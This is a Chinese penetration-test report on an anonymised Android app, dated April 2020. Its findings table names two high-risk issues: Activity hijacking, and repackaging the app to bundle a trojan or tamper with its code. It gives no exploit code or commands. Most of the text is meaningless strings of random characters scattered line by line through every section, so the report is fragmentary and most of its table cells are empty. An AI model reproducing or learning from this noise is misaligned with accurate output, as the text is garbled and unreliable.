) F( j# {; w ]+ e& F: X5 w
4 |3 s* k! g* k6 I# t
( T+ N, k) h! P! g9 I* }2 ~" Y2 c2 B, o9 T4 T& Z! {4 t
/ D6 j* x2 u U' J
$ ^3 _4 i* p' L5 R6 b
. V% d7 l2 M. B' H% e1 G8 I o
- W3 q9 g8 ]3 ?4 B
+ s' i( K- E4 Z j1 E! `4 J/ ]! L+ |6 n- [# Q3 U: j' M
5 T! |8 A; `4 U9 @8 T
$ h* s: F1 u1 t% C& t N4 r! Z
文档编号:
/ a1 V `' g% d. i' [- P6 U" s( B2 J a( ]; O7 |
, J6 ~; W1 _8 D) Y- Z# a3 F2 {' S
, u! J( e+ }" R" {- ]4 z8 c1 n
6 m, b7 @9 M; T3 i
4 P4 C5 |. Z0 R. s, i) W; ?4 F
$ r4 |7 B* b8 L) u3 d0 K- F i
- }' }" i1 W! G/ s% X
/ K( k% q4 z2 }! h. O : f$ t9 A2 M8 U9 v2 t; S/ k
5 ~* q. ]; C/ M& x5 t: ] 0 R+ W7 g! |2 u$ O* J
- V \9 f, U6 M" ~2 X" r
2 Z* w4 v- l. n
4 }% z( x- d8 j3 f5 i7 i) | 4 E. {( X! q$ T9 ^% }" n d5 W+ i
* C- A* t, q& a% G
' ], F+ D: M' d* q. Z0 d; |3 }: o0 }4 p* b) Q0 S
( I$ Y7 j3 {' M2 H6 A9 z7 w1 K9 z6 ~5 b! S" `( |
* f# L' q$ A, e# K$ [
& f0 `7 d8 [( R( C- M
& a: f/ d. m9 X2 }- ?" k+ M" _' n- P& i. X
5 z, }4 k7 n# t8 j" A
8 L7 }& a0 z5 V" {+ {1 p
" a, c" u4 L# f4 w, k" Q
) b6 a' [: i" p' `" s9 h5 `: I % y4 `- W# i) q' D& v9 ^
9 N) U5 C9 r; ?/ F! `& o/ A6 W
$ |/ Y9 d$ F" H/ y! M2 v: l- W# J
( h. I' V5 w9 _3 ~
. c7 b- Q9 I2 r- Y
( a/ c" Z( X! O/ p0 p0 a 某某某APP渗透测试
+ W6 S8 s6 M. e" U# E" s D$ e, |0 W& k- A+ W7 @& O
$ {9 r4 N8 L8 a( k" I
7 [! X+ I O* K5 @6 g, X
3 Z9 {+ f3 c! y2 w
/ n8 f5 \# l% V$ u1 [! g" C 6 G7 `- T8 D/ ~, S: v+ }+ m
5 H% L8 D* g% A& h
# O% U2 V& \. l5 D+ [6 n2 V2 O7 }
* w+ n8 a5 Q* ]/ I; g, E1 v7 } E
+ Q5 h! A( N/ @* S- H
: X9 K4 l; m. h+ @ k& ^ * L& B8 M) h' W! h
! Q4 k1 L* a7 _( |/ ?- Y. e 7 b1 F3 L/ _$ k# `4 q- Y$ R% }% h
0 h9 k/ n& M9 o: G
R. Q$ o) E9 @) s# U9 a, I% `; y a6 g2 |6 t
4 u+ S! V) Z; w6 b
' t4 M9 ]) } ]6 ~5 o7 `1 Y
$ z- @ q: t) i y
8 {. B+ A( o" D- J( U( o
" f1 k% h4 Q) U0 g Y
# K: Z' T3 P- a$ q0 e% G% E , }9 M% a7 w9 S( G1 h
; ]) H) _& n8 D& Z $ _, G& Q/ p y& v- \+ u' f
! V% }2 B; u) T3 h3 `) d ! ]3 G- G T2 p8 M- p( `
, z2 d* K0 U5 Y u Q 技 术 报 告
L8 k" f& _1 v8 n$ A
% ]3 Y/ q+ v: a X( J: I( T& r6 ? ' X3 S+ {1 ?/ K, n
# I7 k. E* R+ C) ~7 J( t0 | ; d% Q0 }4 I/ G/ _7 J
$ U5 v; S! \- Z" U9 B
7 p6 {: p4 |1 L5 l9 I3 f
2 k3 W; s) X0 t
, H N! ?, J F& A' M6 d4 M" v' J- G9 o
: M$ c2 C8 ]/ h
3 C: N1 W5 T. V& }# A
- g4 @# P# l6 s( _! \+ c5 N7 a0 P2 w% K' T7 z+ E
( w$ D6 ?" D8 r/ Y8 H+ y4 y4 e' z. b% ~
, X& A# z" L" ]9 s t% n% q" u ~% i4 z+ \1 Q4 d1 j6 z
2 w7 S2 B$ j& h- a6 o
4 p, [ M1 a( H y# x# _; J 7 f7 ]4 J) t( c/ a" @: f) A6 I$ [9 ]
T! J" J$ W7 }- m( \: _: ~! v
6 I$ a$ M$ J, V# s8 m( u9 L- {- p F0 S' M& I
+ j7 s3 \/ P) _, u/ e/ I5 k: b* g `6 Y0 w
3 s- R- P3 o- O. E/ W7 R) Z; N& w$ f1 e: A F
. _* i( `8 o7 P( h2 f; |
* f7 O* [2 c) c; v7 H' C) @; a
" z r& t& Z2 {' q( G6 x
4 Y: m I. a- o& T7 U* L1 X
. [1 y" J5 x+ I! j3 o0 x- Y' t+ [- z8 C; o% i' C
8 q$ e6 z4 R4 v! m, L- W
* V, |3 m- {7 W
- }$ u# |5 ?3 e7 I* |( p1 O$ h3 }
+ _7 D$ J: ^ M- k- w/ \- O {. c
6 K# h7 J$ _ }$ O2 s0 v, H
0 M7 ]' u& i/ v" @4 |% l$ R- U9 m h3 x" Y. H6 _& }/ B
8 f, k1 y9 T! ]3 q0 q3 `9 U: b4 m6 b' d
% L+ n) ~* r1 n. b- n
, a9 E4 Q% F* F1 Y$ A
* r5 g, L0 l6 H
. d% I! |, u3 E' ]' ^
, y$ i2 P' w+ H
+ c* @/ U; }. Q$ M
9 W& q/ {3 Q0 [
( a" o# z; M! V5 @
' ]* Z) A3 x. Z/ R% p, T3 B% C ~$ m6 G" f5 B9 I9 v# t: m
! |# `" @& @! {' J( \5 S
; `- v; I: Z+ J7 q
2 z& i; w. i! p3 p) E: `5 s0 Z# I7 l8 N. z* E! p
! `$ T( T$ M/ _5 \
! K6 \) g+ |& g: ?# y
: @% H O ~, Z2 q; B
' _0 r; @! r3 j, k( |5 k+ H : Z5 `, `( t& ~7 o) H# P8 ~, G
# t: M2 R; R* G 7 o, }0 m: u: |, q/ j+ R0 s
, T1 \) Q' M" Q% l6 \/ a
* S* Z- U) `% Z) a" S7 Q4 f
+ t! Y, T3 c3 T. Q. f% n
& {, e7 e# |; ? d/ s
6 L* ^" C/ Z8 e $ G8 Y( V& j0 J6 p4 f; Q
3 h9 F4 a" W$ D r& D6 c9 Z! G# X
$ I( d5 Q& M7 a' H+ u
2 {' j7 y6 r2 N5 ?8 l+ f! p3 Z, T8 E
* z% B. @0 v4 E
& C/ ?$ A: U8 _. f0 V1 j4 ?5 ?+ r
# m4 \+ G, }1 J/ G$ ^& v
- g1 N' m* ^3 R9 S6 Q! D7 b: e
$ Y" P( Z! ]) R* ]% N3 P+ c0 w; F. M; ]
) S0 V+ m. x* J. D# i; R$ b
7 n/ j; q" Z9 ]4 e' E' H# K; ? # g9 g5 e6 b0 c! O! a( T
0 n7 d4 D L& V4 R4 U0 u : p" C5 _% l, @ G. C6 {
8 ], z5 V% m/ Y y5 g$ @2 r
4 N. u! O l- H) [" ]/ o1 N
0 M# Z C" d% }3 W# B, Q% Z
: G; {5 u P1 x1 D* n1 F
p% E% T# M5 t" X: |1 q, L % G v( N6 \1 `; a
: F' U* a, G) ~% i# T2 [
* `' ` W7 d1 e7 t- J4 P- L. n# z( X* b: }8 ~7 F1 U
5 R. O/ Y* F/ \5 B% d! r
! U. X* Y1 T- g
: O; R% k- a( X* X" `+ R1 r" c8 z# t
! c. G$ n M/ v9 J
# C' ^8 m4 e# W1 V
. N; W$ I! ^! j4 m8 l7 @
. }9 y5 @' {3 I) x5 d6 [, F- M1 B* b
3 f' n7 o3 f" x: e2 S" {$ b7 X
* y8 Z5 L' J/ ]4 }. T- }; f5 X) P9 L8 V; }6 n/ K
8 J' Q: M2 ^% f( O: L) P6 K. i
9 L/ {. s! K( q5 o, J9 l
. C6 k5 N* k) Y& f6 i8 i! ^% b
' |: {; r5 m2 S% U8 Z2 Q, \
* }, J7 O1 x0 B( ^( g; u+ k7 `$ t7 h3 P8 D4 V5 L+ ]$ d5 O. m& ]
9 j, }- m+ m. i# ]
, ]% I8 r0 v9 R( \. [- | ( G p* `0 i4 c
k8 L$ t; b9 d9 }4 Z& @+ E+ p7 E
二〇二〇年 1 j' r3 k5 b+ x' l6 W
3 T J' b7 g9 n* H/ O9 F1 ]
# i p6 W' A+ `9 K, M9 H! R) ]! n2 ~' @
2 B: @; P" u$ T. S5 y
! C2 d4 {8 j6 X. z: L + s; G6 U& L0 L ]4 A! }
; U6 t3 Y) a+ |$ n) L! | _
: P& p' `7 B! M* O1 T) L$ J! v4 N6 j8 F( z; \- _/ s
! ]& G5 v/ |' |6 A
% V, i4 M6 r3 j8 d K
5 e% Q y1 \9 Q0 X' w5 e" S$ D) l& D
' m7 h; H" ~; E$ o- e- I9 X$ \1 U" d7 u+ p5 i
: N% H2 M5 g7 m& u
7 m7 F" i l" t% Z8 z
9 G, l. E0 s5 I0 q% D% d9 j
+ Z; X+ [( W' L& L# k/ Z ( Z5 D, |! @7 z1 v5 X- K
7 h$ e* o. V3 M/ a6 j( X 目 录
# [+ J9 v) E: K+ U' ^: f
, B8 m) R, S' {8 D! l O q# U 0 g$ V! F6 w$ ]% I0 C5 ]
- k0 F; n v% R2 s& y6 p7 i
2 F7 K3 N8 r3 \' O4 d
; B+ X9 z( z0 @! D, w : A0 R+ K3 T& c" l1 j% q* m+ B
& P6 a$ q9 y5 Q3 t2 T6 b1 f6 R7 F E) w6 s! J" N% d: f
' ^9 L7 {; E: Z- X" n2 ]5 L0 s0 w' O S9 a7 }+ P( @ j/ h/ j6 J, ?
- V d0 {1 x1 L) \5 f% A
4 U8 V$ F z: G J, L6 E
$ a0 Z! a; E8 R9 s4 m 1 概述... 3 : y/ ` G m( v- w8 n0 _- f
/ z, V3 D' ?# O) ]/ T
& P7 @# E9 |3 x$ D! ]3 o8 M2 C6 p' a# c/ B/ m
% W% \! j7 d( e" p* Y
0 p; T! `7 z! w8 H3 F) \+ e+ ^ 1.2测试时间... 3 / Z0 @) @7 I5 H5 I
; s, k& m* E) G1 r: L/ E; {! }9 b
6 ^7 f$ w# W3 k* b
7 K0 D I9 ]2 f* K1 f) a& {
0 {7 P6 K C2 ?2 p- e6 R% h& t% r- _) ]( L- Z/ D
1.3测试对象... 3
# p( X5 ]- J& S2 a' C$ d! ~! V0 G" t, a: K& \
, r+ I. X0 a$ r
( ?/ O5 y+ @6 x# R- c 1 H) L2 N4 j* W1 X% N; M$ C
2 @2 E) Y l5 x: Y- h 1.4测试结果... 3
& A9 u+ c, G7 y \+ G! O' c/ p6 ~3 R1 E; X! l/ P
; w5 y! J$ o1 v
1 O% U! o6 u2 B, I % a, Y# _1 j! L% F
7 W% V( o: W2 n, Z" ?3 h9 L 2 检测结果... 4 ) T5 q; w$ Q+ W: }( S9 d$ C
1 `" \2 v( I) z6 i F + O6 s$ Q. @8 ?/ F5 s- R! e
* b9 K: R0 m; F/ A" _- I3 h
7 _' N3 \ a+ S3 j6 h" E) c) h
+ ~+ s' }7 u1 I, _- b/ W( b$ j 2.1 某某某... 4
$ [: C* b4 S P: ^+ Z' S' K& h' F! K. H8 E. n! F( g
9 \1 n7 s* v' W1 U# R F# i! [) X7 e- b/ o9 L
9 z; I6 c+ O1 P! @: T& U m3 k
( z/ }( f1 C: K3 L 2.1.1检测目标... 4
: [( S! `5 ~9 \ @; D0 m$ R6 K7 U& w( @0 d; z
; @8 X+ G' L! g6 w8 d5 c! s
A( H$ T) n: F, C ' v- u7 z+ `7 ~; i1 p5 o" N
/ P* x$ J" R# [
2.1.2检测结果... 4
8 D! Z0 W: O0 O2 t H
3 }! o- L+ M5 o$ w; q
, k! t2 p9 X1 E6 @4 k) Y& A, Y3 I6 f6 v3 u. Y' k' p0 \7 t6 Y1 n1 k q
. v$ N- q' h6 R% @7 j( r4 S
0 X3 [! L3 U2 V( u4 f( S( V
2.1.2.1. 4
& ~+ Z5 X) @ Z+ p, y. H9 [) L! x+ E6 a' T3 M
' N- A) U% h$ r( |% o! A+ n- c8 c6 z. I9 \3 V) U: r% ]) a
3 ^0 k0 T# }0 |' y8 O& u1 q% z. \; s
2.1.2.2. 6
0 ]5 z, X( `% d3 Q Q
& j0 Y* j7 Y! g M/ X$ | i* H: L" l: G . f9 }9 _" A: K$ d- T% L% N7 j9 m
0 A1 C; N- V6 [8 ~# ^
5 f" b" n) Z% D: F( ^) y0 i' i8 k, {5 e8 t* M( E
3 K4 I2 @* E4 Q8 g9 }4 i
0 C& Q' K6 x% r) i" S) l4 z: W Q
2 V2 U, g2 ~1 g6 O
+ X: d$ Y8 n/ o8 s, P. _
+ ~8 o, `4 y& A e' E+ c. A4 L# ]& C
# `7 z* G. R( `. F( h, F8 h
@: \ h7 c, g6 J
$ r3 J# I3 ~7 z6 n/ z0 T" u
) O( K+ W" e4 s5 `- T# B/ H
1 w' {0 O# D3 f! V/ _7 |1 o1 z G4 S4 `" W8 C" S
1 R9 l5 v9 |' M/ |
' K! o! A' L) w
1 概述 4 Y8 b" \! C ~& b6 w
9 ~2 v# C# P0 H& N 6 t v; i, F H* s+ u. N
3 y: k" p+ v$ k, ?
8 y: j; L# y, ~+ ~3 x2 K, g4 f# V% N
! @' P: I$ |4 Y* [- `. E
1.2测试时间 * @; i) q! v1 p
1 B1 g) s# r0 W- j* D7 h
4 H h5 o( J8 M5 i
4 q7 p: t/ w2 s
7 X9 Q. `: T: L9 ?1 x$ I/ f
$ c* b, Q* m5 s7 {& N i1 _
+ g/ }( R2 x+ h. [( p
$ o+ `2 Z) d' }* L" T % y' i' F, C5 j! L
- t* x, @- ^; _6 B2 v7 \' D
+ I* Q, O" T: c" ~) _
6 q% g* p; K0 N# h8 Y+ P2 ?
9 \7 Y* V; q( D& h. B
4 I% @. b8 V4 l6 t g 渗透测试时间
0 B/ w, K' ^2 f" ?. i' n+ a
7 y) g$ f" m) P. v# ~1 ~ ; l0 S: @% m% ?8 g! V
7 T' h i! k' v! y" w | - R3 ~/ R9 ~ W
3 V' v( x3 F' U- `9 H" V 8 [* J5 d. X% G$ v2 b4 H6 _& K
/ i h) [6 k/ ?5 z
5 S6 u) l2 m+ j F0 K% M- _3 J9 s% ?
. T2 r9 l. D5 Z0 g6 {# x& Z( Y) B
. W6 _0 e3 o* o9 m
5 x; ], D" t7 n5 M
- m/ [/ T3 H# Y2 N7 E
起始时间
8 g8 K+ U( j6 Q% e9 n( G# R4 O, i* ?$ j' i5 T' D4 J
% k- l1 J, Z5 q3 Q# L
6 I, C; |; m$ H3 E | 7 ^$ I) k3 m3 j+ H
4 p& p& G3 {1 j* _7 u& z
2 ^5 E) d4 s- x* \3 [- X* e* G! _
( X4 ?5 O5 B) P* F [+ K5 f
( g. n% ? ]5 K1 G
! k- i% T2 R& |4 m 2020年4月6日 - b8 P1 a* C! R" |! M
h9 ]8 M3 b( s! n' v
* s, X. s: D6 e" Q& ]
! \ ?" U( X2 S n | ; u/ ?) a' [+ l2 o% S3 q
1 n" H# ~! [$ A7 l7 w
- P8 H9 u) g4 G% A0 ]
$ f6 q& b& S1 C8 T" s' t 8 M' s- ?- L2 e6 s, y9 k, T
6 H" [+ E' t0 M3 L
1 b' j3 o+ g J9 G6 x/ b y* `: R- y6 V3 Y! e1 z, T
/ I# P: e" u) b& v; |) J: |% p2 M
# a; V' n1 u) a! f* U% h7 g! S 结束时间
1 a; ]+ K0 N3 C; v2 w0 o- U+ |2 K+ I. R! @* G. O# ?& h
& Z5 i7 [. [5 P: M- B3 R
9 V$ }% u- P1 `: n2 x |
0 l1 d1 K. q' b% z8 z: D/ r* h0 `$ ]+ s7 R0 Z8 U; Q6 N
) L" U5 |; D" ]1 y; R: n/ x0 V% X3 Z" X# [/ ^" D+ X- Y6 f
; b4 i) p+ Y$ j! [" n- k
* S2 z! c! k* P+ v5 e# ]; L! h 2020年4月9日 & @5 Z( F$ K& A7 }4 k3 m, A" h
" i3 Y, m. ]5 ]( |7 m2 H ( l, O, m4 M; S& a
. Z: i: C9 t$ [( P6 m3 U! B |
% E4 P t ~5 b% l! a
* F7 \2 I6 ]6 i ; }& J/ |! J9 b* D& L
: f2 m! l6 H/ [3 ^
7 r0 J4 L1 s9 s& v; Q2 ^ P# u5 ]5 A1 T2 x* S) V k6 e
; @) J1 ^8 u9 d8 ?2 K' w/ |4 R
! I U$ E! m, p& x. {# G$ ?9 e- x : p7 ? \* T7 j
3 u; C. x9 b8 ]) o2 ]. V# b
1.3测试对象
4 S* u$ e$ `9 c. [1 [
4 u/ ^1 ~ F& J+ F% } , ~7 y2 w( ]/ i- y
5 `9 E' m2 `9 \9 {3 L
+ @; {5 D% o) A3 h" m& z) y N; C: y' ~5 T! K
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
# U7 F2 U8 B, r" t& m( R6 {5 m! I6 I. H5 l6 x: p
, l3 a0 d; i* l5 Z
, r% e5 Y/ c6 k q6 B& Y( I
. }0 R) x" h8 N" P/ b a7 R: `; g$ ~
2 a- D2 Y& b7 h f3 h 表1-1 检测对象
! h1 Z8 A3 \! V: V; Y. F/ J% `* [* r# O5 A5 ~5 V* v5 @
0 H8 e6 h: f( ^ F8 n" y/ r% [- c7 M* T. G
v; A' q; T D0 X9 ~( I. `0 y& p3 y* x6 [+ T! y! c2 R
! }' A7 S" f* M s/ B# t
) Z* B$ `3 W# X. G 2 L+ y( M8 U# R, b( ~5 z) G( `
2 y; t# W" ^9 A p( [1 S9 n( u / K- _( n+ P1 g. M
0 f( k7 A5 E+ [. o5 g9 h: B % {( D! ?- c6 \; \+ ]7 L. H3 X
- k2 E) E! _- x' j! U
序号
) S. b6 b! F, D7 x& v Q& J8 y) c% c% o* I* A
% r; a; R& v( u3 t
/ \; F* \( u. w: e5 @. l! n
| 6 `6 @8 W+ z+ U% j
- ~/ R$ y5 ^! s1 e
2 \6 D. @. h; n/ H
* t* l$ p% M! H, f3 Q# ?. j
' u# I c1 [8 c- s0 ]2 a8 p( O+ i1 A
测试对象 4 y: ~7 C/ {0 _' K/ o" V! j$ I
7 Y' K! t% m7 d; v& j" L: V! l# [
8 |- L- L X9 [" [ ]+ e5 c9 W7 T- ^! E) x- w' Y5 O
| 2 y; l, }6 u& u6 z% h0 @* Y
* |6 U- m, [/ U
$ {6 y- M, W% x, }9 P6 u9 Q
9 r$ D3 V4 l# m4 O* i
# l, B$ `+ P6 O4 w
1 t2 A ~5 i3 j! m9 X' l$ | 测试地址 % g2 T' Q) F) y+ v. G6 S; o
' B6 W' }) `0 u, Z# y2 X ) A' ^& ~1 R" Q. ?! p" l, D9 E
8 F2 O1 E( f# E. M |
" b+ c* u; `9 P, D; \" i& ^" A }7 I) [# D% j9 J+ M7 T4 N
5 z+ u$ |- x# q! p" h
- b, U( p- t) b X( P5 c# U1 G# r
0 W, W1 Q( m$ H6 `" A
+ N K! E" R! k/ ^2 C 安全漏洞 9 V O) \9 h+ G! h; ?% d" t$ z: g
3 f8 h5 e' M7 {/ N$ Q1 e3 n 9 Q* d) l- g _+ q2 I# `
- ~( ]* r7 J. j6 {* c |
( @/ [0 E/ a* v* n- A' r* i$ K- S x" i- k I# t- s" @
! P( D) M. Q$ V' ~ p1 s8 Y2 \/ x2 n4 k/ O$ X0 F+ g8 Z
+ P8 \' F$ G/ X! ]' x
: W- U+ M5 z1 ?2 e% j
- m, E. k6 H9 r3 t6 _
) B$ O% @7 x6 i4 N, s2 a * b8 u* g7 L+ @/ Y- _6 t. `7 J a; a
& _% E3 _- X& }3 b$ W: T: V4 ~ 1 Z( z) E6 Z! m- {, Z* L; k
: m2 V3 D- y3 U& B8 I( e & N; g* B4 _2 L0 n
2 m, C5 m7 H5 K: v
|
5 Y, B" ]: p" _5 O8 |/ h5 V6 K" Y, K4 B" _% e: h$ {. `
7 q# z. T8 O: l* B
3 s' W J: g$ |" ^) u0 Q* C- B
p [1 L: e' S: ^: ~
4 n( ~# t; t$ E# Y8 n 某某某安卓APP 1 `( L0 J3 V9 J' c0 `+ c- i
+ R/ j9 a* }0 N5 s$ e+ l
% e* p# E' y: s
: A% C3 X8 D0 o6 K" [: r |
$ O/ G3 F7 G; [! l5 p) v$ w/ G* a! W& l' O
5 J7 g! j! S8 S
. M6 @2 j: a: w; P0 Y. R& T- `
+ Y# Y+ d; E: p h9 _
' O% ?+ @& X+ b' c* U! ?6 M& n7 H
' Z# v& j) _3 @+ R' G* W2 X6 O9 t5 i( x9 z5 u
3 T6 E3 I$ I6 v& T' C \- Z
; a0 g+ d& I: k, E6 Q& N5 b$ B | ! E: _3 {1 w7 Y# ^: W
% E4 G" P4 S" t3 C. `9 @5 v
8 i/ W7 Y) s x4 l9 @4 l. F
3 S- ~! z \* {" @" P# I- D
8 V- @: S% Y7 U) h1 H+ \/ x1 Z4 j
/ e* B! l, k# O, A 2 " G- @+ f3 p& T4 m! \ y: t
4 N- j7 l* X& I
' r. k! Z3 p6 g
! X p& R! j) `1 x- J& n& c% r | & M, j) R5 z3 q: n1 l/ z# Y
( e: M* _2 z( ?$ f2 ]' E- P
5 K& T) R) ]- J
: U" K; G9 E0 |& C' d( {, h # u1 l& G e# i% e
" g2 g5 ?2 M) h0 J3 M, {! S, P 6 }2 r7 u- u8 v
9 Y- z" k2 r+ q2 t
5 { l% I3 @9 g7 s
6 V1 M. G6 C8 [- n4 n( K, ]( X* U 1.4测试结果
- p) h7 t1 N. [4 s, V# k' C2 J, R
% I" w( \7 B0 y
* q1 [" F2 I) S# _( w" C! D" \+ \! V0 o- ?. ^0 Q* K
1 Q/ C- _4 d H9 }2 e
4 `) F/ B2 s- o" p+ j9 U+ C. A/ p! y
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 9 s8 S U! R3 M$ s
9 D7 @2 `' x% d2 x# P
" x$ t" w( q! T4 Y) _! O/ n4 @5 y) F% k6 l
- {- I$ s, A) u+ q9 V7 d; d
7 a( G" X, u7 q- x( n5 C8 d 9 n( e" y1 X4 y" I( A6 e
; g( M5 V: Q& {4 w' f) L * ]6 ]$ c9 ~& Z2 U) i( \
. r" [# \' u9 J+ d9 A& M' |' g) m
# C- Y% J; Z' X; z! i( O9 X0 f
# V# X4 I: g6 G- _1 I; u3 `7 w
" ?" _! L/ o+ f4 }( V: _
. v. A5 _6 s9 d% y6 s; A$ @
+ n2 C, i+ s" @1 c1 {6 t" Y
1 v2 l% F$ m m: S
, J2 G" \" P8 D5 M0 n& S8 r- [( L( O. E+ @& T% ]
9 e/ [% J9 B( H2 `
# B' h+ v% F1 w+ Z" l
% P" l% _6 _% P# Y3 w
2 I) B. I# `3 N2 u. q0 B4 n( H% ]1 E: j# x 序号
# H1 A0 U" z1 r% c) k$ U3 p( ?% v, p9 K, }3 A: M7 S2 }0 b/ v: t
0 {7 q, t* X8 y+ H1 c* z0 f \
5 m, v8 A7 w% ]( C) ?; p
| & x% j2 S& {. {% {9 {
6 Q* b" ~/ ^, D: t7 {# |
" d9 }. R' \6 q' _+ Q& b" T1 M' l5 L4 Y
; Z C: L' l) O3 {
1 c. C# A$ O( m+ k
6 C. J' E4 [ X8 x2 X9 @$ ~' ~ 系统名称 " r; n5 S/ e. O6 j- i
& @. |. W, B# y* E
5 V* G" a" L4 ~, {+ g9 t
4 S0 N7 d6 Q& F/ X: T/ J |
$ y S$ y- H" K+ ?( K- |. l- N
% Z. ?3 \' C+ N4 p U
0 K) W: y4 \$ {. g. @" z$ A6 F8 D1 ?. X/ v
; c) v! ~* d6 H; {& o" E9 Q# Q) U! }8 r8 b
漏洞名称 4 x4 D# ?* n6 h
! P* ~8 L& J, c* g. K7 w, K& J; v
" f9 H6 p: ^. A
8 e* T- `% i& {6 t
|
3 T" G( \! C9 q( a& f; e2 ~$ d4 h% l0 n
3 @ H/ u6 x* K) D: J k( I' L
# y7 a: C8 b+ t P( \+ F5 o 1 e, I, Y; Q8 Q- w. S
+ ~1 |2 V2 B9 l- M0 ^: l$ _
漏洞危害
" P' w5 l' z' X$ X8 \6 f6 u& m! K
' e; R7 G- Z( x9 |+ B0 X ( d' }! B, v) K8 `7 u9 J
9 d. a, h/ l& U |
, a/ e' Q- ~& l2 X4 ~4 S7 }( U# n8 a s, f! P
" a" Z3 v+ |9 ^- @. G$ k/ m( `0 y# g( y* \) K+ g: J
2 Y2 u- A3 T5 [. s& [1 O- Y
/ ^* t* v: T1 S! |# ` 修复结果 7 T0 K" Y' ]# N+ S! w G" T5 p' K
1 b) B' B7 d% I+ m' v
5 } U1 h5 \$ u( C$ v
; E& O* H; K6 C) F |
5 S4 g1 G! H( E# ~6 ~+ h' t; K
: Q( N6 e5 z, b
3 [0 a( H# P2 D" R+ E1 [% t
. [7 M9 N) m# _( a* k7 {+ S$ k' m
B! H/ k _' A; O' D, Z; r- G) A9 U6 y/ y$ [% K4 Z% @
2 O) G1 E4 t1 X
4 ~ _8 @8 L0 G8 f3 P
J( P4 I6 z" h2 b2 p( x
' M5 C: k0 O/ p 1
9 z' l$ q+ y f N0 @8 g. ], D
$ }/ ]& g$ {. f8 `8 Q
Y2 B+ L* L- J% _" `" O) V
- I+ v& P% H) k( d o | ) S* H2 Q. C U
& L: d, V" I/ m$ y: Z K7 Y9 i( c. l4 Q
$ M2 Y* k% A, c% B/ s : c+ u; W+ ^( M6 T( X$ G6 I8 f2 z
/ n) j/ z, e' Z! G0 I 某某某某某某APP
% M' [& [. N* z1 _: S* q) f9 t& q* D/ V+ q2 `
/ N9 I% n8 O1 [
! B9 J0 }1 _5 k, E. X |
! g# B7 j1 W0 E2 K; l. X! ~2 X+ Q) k! [. u8 b
0 M/ M: X6 W2 i" X( X. b
1 d% @5 Y0 A U" q% B. U , `0 L* z" X L
; m9 G5 k9 K3 i w- B7 q Activity 劫持
) u0 X& x+ f1 T9 t+ @! E
8 ^/ c7 j( }; `4 b, ?9 ? 3 k$ F' V; y8 K0 j* ~
! Y7 e H9 J1 |6 h* x: j
7 [, D1 z& e' M9 L F, h* g: G9 v. h
1 l, Q7 W7 k b9 }. I- ?" Q3 y" Z
+ A' S/ u$ H X1 I6 O2 O
. V, O+ q2 m; n# R2 x) `" L: z$ U/ `& l& W
| - D4 D6 g S5 E" E2 t
" y3 F& d( q% ^; `' r8 c
/ k, B, H9 t: l. q, T
6 g- I! [8 K2 [; z9 H9 L ! a5 s w6 U# Y3 e A: O
& u$ X' q7 {6 a5 B" w9 [
高
8 X- V8 l) c/ r# g% W* P( N
; |1 B0 F( e2 }% z
+ W" x% s( U) I1 R; g, e$ `7 \' _: Z+ ^. C) J
| 7 s9 Q+ z/ x! E4 C4 G, S
$ k1 o" O! ]+ N, M7 j
# i0 e/ Q, u' n/ X8 ]* s1 Z4 _$ s8 e: U% ~5 Q* Z3 f9 X% V0 ]+ H
5 G+ x5 q6 k% M' ]! A- C" S# W
& x+ p' g( u. s- l: Q9 D. P$ w( l
1 r( i" A ]* d/ L
- Z. L* a1 A1 E I! d. a
' p8 G# K ^$ x3 j& q0 _7 ?& _
% @8 C6 _ @ F/ c | " U& l$ C8 X: S P* W8 c. }
/ i/ T( e. a8 ?8 t# U
( i \5 P2 l2 z' S2 z+ v7 A: z, J7 ]. H% E
% U8 g$ Z: W5 j& N+ \& i, m) V% B) ?& q( t' Y! ^( X/ s5 L' w* a6 w
6 t3 @* ^$ X( u+ G2 g+ M
. n0 Y1 A3 f4 C1 ~
2 O: r# w; @6 \& z3 E P7 F+ x* P4 v7 A. V* V6 D9 O
2
& m; r( v, x4 k* [3 G
( ]' U b0 k$ D" U3 B; V
9 J/ y ] D# O+ e9 |1 Q* Q5 l$ r7 t- E2 F+ P. ?- F1 U2 i5 @# p
|
) X% y) z0 L5 L2 x( Z; e* }% B3 D/ C3 F
' x8 t. u/ n% c* R5 C j* V
8 J' k) @& U& x+ W6 _( e8 c# U: Q
% F: i: S; s# y$ b' t, H
/ V# O% X1 e* n" e- t 某某某某某某APP
# M+ a/ n) Z- N; J5 ^3 I# s
x) H, G. V+ t " b, }" y- H7 _3 k$ t9 s
! [; U2 O& H" d% u1 H | + E% {5 s0 E N+ R0 z+ y' N! `( @5 T
5 \! G% L8 H7 Q% C" H' X( G
, B3 A6 ?# h1 j8 H* ]# L# i
3 {6 o. \* K/ Q0 j
$ _ ^/ _1 r6 J5 i4 [% ^; P" H* f2 h7 T9 Y9 `/ ]$ H, E
反编译二次打包捆绑木马、篡改APP代码 5 P+ R+ j6 k$ _3 b+ d9 o
9 |/ B7 a y, F- z5 H' d3 i
* z9 ^" A8 P, m" C% }. b: ` Z% A/ g2 z: {
|
5 Z1 |* v B+ N% T7 l6 l* L" F
3 I& f# B7 `1 q+ d ! G& p }, d* f
: l5 G' S$ u# q, V( Q' j" {
( c3 Q" [1 u% q# \' t
% u" Q; N( X# Z1 l
高 " d9 L6 B( o& ~0 q+ l5 A4 g0 h
7 P& Q7 Q8 S, c6 R% U ' r2 |$ X& K7 l/ i$ U% f% b, e+ A
" y: O0 C" l a/ Q L
|
1 W! t0 g9 |5 O5 r) U; [
, Y% Q0 G# ^! S9 K ; ^4 m2 r4 f% g' M% u
, t9 \$ }7 `0 C" Y6 s2 m' u# b
* j3 U" n' g( G: ^7 X
/ }! @7 [7 a. u# \
+ [' f! k5 v" o6 s3 b9 a6 j, j
& R! V3 m; b' H8 B/ p; F 7 p. a; l. p) |# C( J
" ^! K5 Q1 w1 m
|
( j6 p+ M3 z, S4 n; i6 b7 ^" X
5 L, ]3 K7 r$ ?4 R
& a3 O+ ~7 d, J5 g# B$ U# C
; n; \; r+ Z: G! g3 j5 [
& |1 t8 M! a E5 n/ b2 T- ~$ n) Z! b; s: L5 Z9 m: Z
' o6 C! \. \3 ^9 D" i% P) }6 G' T S9 \3 {
* b; h& ?: \4 W3 E. B
: w. Y' e6 ?+ c9 j: a$ f0 d
: d5 E: W7 J G, E% n
+ g- g( I) a, F' X; y
( [6 {1 p+ g! L7 E5 j& k8 A4 O
